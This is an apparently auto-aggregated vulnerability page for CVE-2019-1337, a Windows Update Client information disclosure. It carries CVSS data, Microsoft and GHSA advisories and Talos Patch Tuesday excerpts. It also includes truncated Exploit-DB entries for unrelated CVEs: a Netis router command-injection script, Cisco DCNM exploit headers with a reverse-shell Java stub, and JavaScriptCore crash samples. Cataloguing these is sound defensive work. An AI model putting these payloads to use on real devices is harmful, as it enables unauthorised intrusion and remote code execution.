CVE-2019-1337
published 2019-10-10CVE-2019-1337: An information disclosure vulnerability exists when Windows Update Client fails to properly handle objects in memory, aka 'Windows Update Client Information…
PriorityP429medium5.5CVSS 3.1
AVLACLPRLUINSUCHINAN
EXPLOIT
EPSS
2.05%
78.9th percentile
An information disclosure vulnerability exists when Windows Update Client fails to properly handle objects in memory, aka 'Windows Update Client Information Disclosure Vulnerability'.
Affected
19 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| microsoft | windows | — | — |
| microsoft | windows | — | — |
| microsoft | windows | — | — |
| microsoft | windows_10 | — | — |
| microsoft | windows_10 | — | — |
| microsoft | windows_10_version_1903_for_32-bit_systems | — | — |
| microsoft | windows_10_version_1903_for_arm64-based_systems | — | — |
| microsoft | windows_10_version_1903_for_x64-based_systems | — | — |
| microsoft | windows_server | — | — |
| microsoft | windows_server | — | — |
| microsoft | windows_server_2016 | — | — |
| msrc | windows_10_version_1809_for_32-bit_systems | — | — |
| msrc | windows_10_version_1809_for_arm64-based_systems | — | — |
| msrc | windows_10_version_1809_for_x64-based_systems | — | — |
| msrc | windows_10_version_1903_for_32-bit_systems | — | — |
| msrc | windows_10_version_1903_for_arm64-based_systems | — | — |
| msrc | windows_10_version_1903_for_x64-based_systems | — | — |
| msrc | windows_server_2019 | — | — |
| msrc | windows_server_version_1903 | — | — |
CVSS provenance
nvdv3.15.5MEDIUMCVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
nvdv2.02.1LOWAV:L/AC:L/Au:N/C:P/I:N/A:N
vendor_msrc5.5MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Microsoft
Windows Update Client Information Disclosure Vulnerability
vendor_msrc·2019-10-08·CVSS 5.5
CVE-2019-1337 [MEDIUM] Windows Update Client Information Disclosure Vulnerability
Windows Update Client Information Disclosure Vulnerability
Description: An information disclosure vulnerability exists when Windows Update Client fails to properly handle objects in memory. An attacker who successfully exploited the vulnerability could potentially disclose memory contents of an elevated process.
To exploit this vulnerability, an authenticated attacker could run a specially crafted application in user mode.
The update addresses the vulnerability by correcting how the Windows Update Client handles objects in memory.
FAQ: What type of information could be disclosed by this vulnerability?
The type of information that could be disclosed if an attacker successfully exploited this vulnerability is the contents of Kernel memory. An attacker could read the contents of Kernel memo
GHSA
GHSA-x5vx-fhp4-xhcv: An information disclosure vulnerability exists when Windows Update Client fails to properly handle objects in memory, aka 'Windows Update Client Infor
ghsa_unreviewed·2022-05-24
CVE-2019-1337 [MEDIUM] CWE-200 GHSA-x5vx-fhp4-xhcv: An information disclosure vulnerability exists when Windows Update Client fails to properly handle objects in memory, aka 'Windows Update Client Infor
An information disclosure vulnerability exists when Windows Update Client fails to properly handle objects in memory, aka 'Windows Update Client Information Disclosure Vulnerability'.
No detection rules found.
Exploit-DB
Netis WF2419 2.2.36123 - Remote Code Execution
exploitdb·2020-03-02·CVSS 5.5
CVE-2019-19356 [MEDIUM] Netis WF2419 2.2.36123 - Remote Code Execution
Netis WF2419 2.2.36123 - Remote Code Execution
---
# Exploit Title: Netis WF2419 2.2.36123 - Remote Code Execution
# Exploit Author: Elias Issa
# Vendor Homepage: http://www.netis-systems.com
# Software Link: http://www.netis-systems.com/Suppory/downloads/dd/1/img/75
# Date: 2020-02-11
# Version: WF2419 V2.2.36123 => V2.2.36123
# Tested on: NETIS WF2419 V2.2.36123 and V2.2.36123
# CVE : CVE-2019-19356
# Proof of Concept: python netis_rce.py http://192.168.1.1 "ls"
#!/usr/bin/env python
import argparse
import requests
import json
def exploit(host,cmd):
# Send Payload
headers_value={'User-Agent': 'Mozilla/5.0 (X11; Linux i686; rv:52.0) Gecko/20100101 Firefox/52.0',
'Content-Type': 'application/x-www-form-urlencoded'}
post_data="mode_name=netcore_set&tools_type=2&tools_ip_url=|+"+cmd+"&
Exploit-DB
Cisco Data Center Network Manager 11.2.1 - 'getVmHostData' SQL Injection
exploitdb·2020-02-06·CVSS 9.8
CVE-2019-15984 [CRITICAL] Cisco Data Center Network Manager 11.2.1 - 'getVmHostData' SQL Injection
Cisco Data Center Network Manager 11.2.1 - 'getVmHostData' SQL Injection
---
#!/usr/bin/python
"""
Cisco Data Center Network Manager HostEnclHandler getVmHostData SQL Injection Remote Code Execution Vulnerability
Tested on: Cisco DCNM 11.2.1 Installer for Windows (64-bit)
- Release: 11.2(1)
- Release Date: 18-Jun-2019
- FileName: dcnm-installer-x64-windows.11.2.1.exe.zip
- Size: 1619.36 MB (1698022100 bytes)
- MD5 Checksum: e50f8a6b2b3b014ec022fe40fabcb6d5
Bug 1: CVE-2019-15976 / ZDI-20-008
Bug 2: CVE-2019-15984 / ZDI-20-060
Example:
saturn:~ mr_me$ ./poc.py
(+) usage: ./poc.py
(+) eg: ./poc.py 192.168.100.122 192.168.100.59:1337
saturn:~ mr_me$ ./poc.py 192.168.100.122 192.168.100.59:1337
(+) created the account hacker:Hacked123
(+) created the 1337/custom path!
(+) leaked vfs! tem
Exploit-DB
Cisco Data Center Network Manager 11.2.1 - 'LanFabricImpl' Command Injection
exploitdb·2020-02-06·CVSS 7.5
CVE-2019-15978 [HIGH] Cisco Data Center Network Manager 11.2.1 - 'LanFabricImpl' Command Injection
Cisco Data Center Network Manager 11.2.1 - 'LanFabricImpl' Command Injection
---
#!/usr/bin/python
"""
Cisco Data Center Network Manager LanFabricImpl createLanFabric Command Injection Remote Code Execution Vulnerability
Tested on: Cisco DCNM 11.2.1 ISO Virtual Appliance for VMWare, KVM and Bare-metal servers
- Release: 11.2(1)
- Release Date: 05-Jun-2019
- FileName: dcnm-va.11.2.1.iso.zip
- Size: 4473.54 MB (4690850167 bytes)
- MD5 Checksum: b1bba467035a8b41c63802ce8666b7bb
Bug 1: CVE-2019-15977 / ZDI-20-012
Bug 2: CVE-2019-15977 / ZDI-20-013
Bug 3: CVE-2019-15978 / ZDI-20-102
Example:
saturn:~ mr_me$ ./poc.py
(+) usage: ./poc.py
(+) eg: ./poc.py 192.168.100.123 192.168.100.59
(+) eg: ./poc.py 192.168.100.123 192.168.100.59:1337
saturn:~ mr_me$ ./poc.py 192.168.100.123 192.168.100.
Exploit-DB
Cisco Data Center Network Manager 11.2 - Remote Code Execution
exploitdb·2020-02-06·CVSS 9.8
CVE-2019-15975 [CRITICAL] Cisco Data Center Network Manager 11.2 - Remote Code Execution
Cisco Data Center Network Manager 11.2 - Remote Code Execution
---
#!/usr/bin/python
"""
Cisco Data Center Network Manager SanWS importTS Command Injection Remote Code Execution Vulnerability
Tested on: Cisco DCNM 11.2.1 Installer for Windows (64-bit)
- Release: 11.2(1)
- Release Date: 18-Jun-2019
- FileName: dcnm-installer-x64-windows.11.2.1.exe.zip
- Size: 1619.36 MB (1698022100 bytes)
- MD5 Checksum: e50f8a6b2b3b014ec022fe40fabcb6d5
Bug 1: CVE-2019-15975 / ZDI-20-003
Bug 2: CVE-2019-15979 / ZDI-20-100
Notes:
Si.java needs to be compiled against Java 8 (the target used 1.8u201):
import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;
import java.net.Socket;
public class Si {
static{
try {
String host = "192.168.100.159";
int port = 1337;
String cmd =
Exploit-DB
JavaScriptCore - Type Confusion During Bailout when Reconstructing Arguments Objects
exploitdb·2019-11-05
CVE-2019-8820 JavaScriptCore - Type Confusion During Bailout when Reconstructing Arguments Objects
JavaScriptCore - Type Confusion During Bailout when Reconstructing Arguments Objects
---
The following sample was found by Fuzzilli and then slightly modified. It crashes JSC in debug builds:
function main() {
const v2 = [1337,1337];
const v3 = [1337,v2,v2,0];
Object.__proto__ = v3;
for (let v10 = 0; v10 inherits(*cell->JSC::JSCell::vm(), std::remove_pointer::type::info())
../../Source/JavaScriptCore/runtime/WriteBarrier.h(58) : void JSC::validateCell(T) [T = JSC::JSFunction *]
1 0x108070cb9 WTFCrash
2 0x103907f0b WTFCrashWithInfo(int, char const*, char const*, int)
3 0x106c0900f void JSC::validateCell(JSC::JSFunction*)
4 0x106c0275f JSC::WriteBarrierBase >::set(JSC::VM&, JSC::JSCell const*, JSC::JSFunction*)
5 0x10705a727 JSC::DirectArguments::setCallee(JSC::VM&, JSC::JSFunction*)
6 0x
Exploit-DB
WebKit JavaScriptCore - Out-Of-Bounds Access in FTL JIT due to LICM Moving Array Access Before the Bounds Check
exploitdb·2019-04-03
CVE-2019-8518 WebKit JavaScriptCore - Out-Of-Bounds Access in FTL JIT due to LICM Moving Array Access Before the Bounds Check
WebKit JavaScriptCore - Out-Of-Bounds Access in FTL JIT due to LICM Moving Array Access Before the Bounds Check
---
/*
While fuzzing JavaScriptCore, I encountered the following JavaScript program which crashes jsc in current HEAD and release (/System/Library/Frameworks/JavaScriptCore.framework/Resources/jsc on macOS):
*/
// Run with --thresholdForFTLOptimizeAfterWarmUp=1000
// First array probably required to avoid COW backing storage or so...
const v3 = [1337,1337,1337,1337];
const v6 = [1337,1337];
function v7(v8) {
for (let v9 in v8) {
v8.a = 42;
const v10 = v8[-698666199];
}
}
while (true) {
const v14 = v7(v6);
const v15 = v7(1337);
}
/*
Note that the sample requires the FTL JIT threshold to be lowered in order to trigger. However, I also have a slightly modified version that (l
Talos
Microsoft Patch Tuesday — Oct. 2019: Vulnerability disclosures and Snort coverage
blogs_talos·2019-10-08·CVSS 6.4
[MEDIUM] Microsoft Patch Tuesday — Oct. 2019: Vulnerability disclosures and Snort coverage
By Jon Munshaw.
Microsoft released its monthly security update today, disclosing a variety of vulnerabilities in several of its products. The latest Patch Tuesday discloses 60 vulnerabilities, nine of which are considered "critical," with the rest being deemed "important."
This month’s security update covers security issues in a variety of Microsoft services and software, the Chakra Scripting Engine, the Windows operating system and the SharePoint software.
Talos also released a new set of SNORTⓇ rules that provide coverage for some of these vulnerabilities. For more, check out the Snort blog post here.
### Critical vulnerabilities Microsoft disclosed nine critical vulnerabilities this month, eight of which we will highlight below.
CVE-2019-1333 is a client-side remote execution vulne
Talos
Microsoft Patch Tuesday — Oct. 2019: Vulnerability disclosures and Snort coverage
blogs_talos·2019-10-08·CVSS 6.4
[MEDIUM] Microsoft Patch Tuesday — Oct. 2019: Vulnerability disclosures and Snort coverage
## Microsoft Patch Tuesday — Oct. 2019: Vulnerability disclosures and Snort coverage
By Jon Munshaw.
Microsoft released its monthly security update today, disclosing a variety of vulnerabilities in several of its products. The latest Patch Tuesday discloses 60 vulnerabilities, nine of which are considered "critical," with the rest being deemed "important."
This month’s security update covers security issues in a variety of Microsoft services and software, the Chakra Scripting Engine, the Windows operating system and the SharePoint software.
Talos also released a new set of SNORTⓇ rules that provide coverage for some of these vulnerabilities. For more, check out the Snort blog post here .
## Critical vulnerabilities Microsoft disclosed nine critical vulnerabilities this month, eight of
2019-10-10
Published